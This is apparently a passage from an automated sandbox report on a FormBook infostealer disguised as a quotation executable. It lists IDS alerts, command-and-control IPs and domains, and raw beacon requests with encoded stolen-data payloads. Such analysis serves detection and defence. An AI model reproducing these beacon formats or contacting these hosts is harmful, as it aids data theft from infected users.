Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52664 -> 203.161.55.102:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52666 -> 203.161.55.102:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52667 -> 116.213.43.190:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52668 -> 116.213.43.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52670 -> 116.213.43.190:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52671 -> 13.248.169.48:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52672 -> 13.248.169.48:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52674 -> 13.248.169.48:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52675 -> 38.47.232.224:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52676 -> 38.47.232.224:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52678 -> 38.47.232.224:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52679 -> 35.190.52.58:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52680 -> 35.190.52.58:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52682 -> 35.190.52.58:80

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 203.161.55.102 203.161.55.102
Source: Joe Sandbox View	IP Address: 165.154.0.120 165.154.0.120

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View	ASN Name: INTERHOPCA INTERHOPCA
Source: Joe Sandbox View	ASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK DNC-ASDimensionNetworkCommunicationLimitedHK
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_009825E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_009825E2

Source: global traffic	HTTP traffic detected: GET /p1dd/?MXOD=nDFLlbM87h&9TND4h=G7DDmCfNGXy3uJCEgcIIU1iXFvarFYWbvsRS9sxoYaNScQyM2A1goKEbo8KV9mX8trrejs5AH6YGa7AwDEXag2zD7gw0a+PZJfygUURv+5LCwJWR5NAeUOI= HTTP/1.1Host: www.778981.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /kfqo/?9TND4h=NiOdQOuMLD2zHgMWwKws4JzuutDmLpx3tWxYTf2s7ZGupi3Uz5m5Dts89dE7D44P7JMDqAvEJ+8u+Llyo4b9pPx+fjdmUm+qFImntH+EZRPwIZM2dcS4AHM=&MXOD=nDFLlbM87h HTTP/1.1Host: www.binpvae.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1kbe/?MXOD=nDFLlbM87h&9TND4h=tZQfW8UiiNJTf5Fq5WrX9vmmZrioxCoVqMwq5i80b8QJkwpSgFAdETlO4QFSoDRfTxjpMxprnPemrx/P1Sfw5KD2hu+ipHyltaJOhZhwSC5dlgXXfIxM6PM= HTTP/1.1Host: www.a9jcpf.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /il19/?9TND4h=2W0Inf+zka60rkge6x3gGQQeo1iuz6hi+bPXuzv4I1vHSGtqZzoorLZZnoCmwyX2i4rMR0gWWwZYBzao7rAttPu5367SyozTICrQ88OWOZt9joXCP1iWm4I=&MXOD=nDFLlbM87h HTTP/1.1Host: www.mhtnvro.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ff8d/?MXOD=nDFLlbM87h&9TND4h=ohJD03igrpR8lwlwc1M4EqZrzingiHicFb+y4T5GGfrPyp+0FgUaOIwicDYxE9IqyQjr9lfiRuNbkNF7eyT6Zergy2OfkJkLywWhdn0W3d/t29Aith2p64g= HTTP/1.1Host: www.lexiecos.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /l8a4/?9TND4h=CPL7YN3vcnDyuUFtA6pv3uMhLFbLrJb1JE9LZisFmiEQ0vYrwOGtj9QBvlTfLzXcbjIACE/TYt0vO88JJ7+OI7LCsTQn12dDmlA0tsWVEcE74AqN9n1fFjE=&MXOD=nDFLlbM87h HTTP/1.1Host: www.augaqfp.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /cns4/?MXOD=nDFLlbM87h&9TND4h=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs= HTTP/1.1Host: www.webuyfontana.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /rmef/?9TND4h=UdI5Nug9LeCq3QKyZxAFTuhDHYNaCA3T0/tR5L8b4jWaA2fUCVH3fLw1ebDEBIsiTWaLxfrgjTz4bD/84RJrNmZZ6yqPN++//ptV/K/4BOxQ2TPEoKO+wL0=&MXOD=nDFLlbM87h HTTP/1.1Host: www.ytw6.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /2e2r/?9TND4h=0euIbLTFP3+EyEtzvor9i8vHBXpYgQpCpm4T5C+2kVz8Gw9LnD+VjddQp9QTALZxA8pe/VRvpSGAU2oGCWkdjrfpA+HWsjyp03alRT8mG3hS2I+8+ag3/fo=&MXOD=nDFLlbM87h HTTP/1.1Host: www.hsck520.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.778981.com
Source: global traffic	DNS traffic detected: DNS query: www.binpvae.lol
Source: global traffic	DNS traffic detected: DNS query: www.byteffederal.com
Source: global traffic	DNS traffic detected: DNS query: www.jjkelker.com
Source: global traffic	DNS traffic detected: DNS query: www.a9jcpf.top
Source: global traffic	DNS traffic detected: DNS query: www.mhtnvro.lol
Source: global traffic	DNS traffic detected: DNS query: www.lexiecos.top
Source: global traffic	DNS traffic detected: DNS query: www.augaqfp.lol
Source: global traffic	DNS traffic detected: DNS query: www.webuyfontana.com
Source: global traffic	DNS traffic detected: DNS query: www.ytw6.top
Source: global traffic	DNS traffic detected: DNS query: www.caroinapottery.com
Source: global traffic	DNS traffic detected: DNS query: www.hsck520.com
Source: global traffic	DNS traffic detected: DNS query: www.mebutnotme.store

Source: unknown

HTTP traffic detected: POST /kfqo/ HTTP/1.1Host: www.binpvae.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.binpvae.lolReferer: http://www.binpvae.lol/kfqo/Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 203Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 39 54 4e 44 34 68 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4e 6e 70 74 34 4c 63 69 39 59 44 36 6f 74 7a 43 42 4c 67 71 74 32 70 78 59 36 58 41 35 71 79 75 6c 48 44 64 31 49 36 6e 44 4d 51 65 6d 34 70 57 4f 59 31 35 37 4c 59 70 78 30 50 54 51 63 73 48 6d 5a 34 4c 6a 4c 6a 43 2b 70 78 77 4d 77 42 77 52 55 32 6d 54 59 50 66 73 6e 69 45 4f 47 2f 47 4e 73 6f 62 63 38 2b 44 49 31 74 6b 55 69 58 32 70 78 54 56 61 4e 75 54 39 72 2b 58 35 4c 34 58 74 6f 74 6f 73 34 48 4a 4c 67 4a 46 67 45 47 6e 4c 57 5a 61 43 49 38 34 66 57 4e 51 56 55 6e 78 4a 6b 51 6f 41 41 35 4d 72 6a 41 6a 35 48 50 4f 57 49 31 68 4c 77 3d 3d Data Ascii: 9TND4h=Agm9T7DKMA28Nnpt4Lci9YD6otzCBLgqt2pxY6XA5qyulHDd1I6nDMQem4pWOY157LYpx0PTQcsHmZ4LjLjC+pxwMwBwRU2mTYPfsniEOG/GNsobc8+DI1tkUiX2pxTVaNuT9r+X5L4Xtotos4HJLgJFgEGnLWZaCI84fWNQVUnxJkQoAA5MrjAj5HPOWI1hLw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 01:24:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 01:24:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 01:24:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 01:24:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 05 Jul 2024 01:25:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 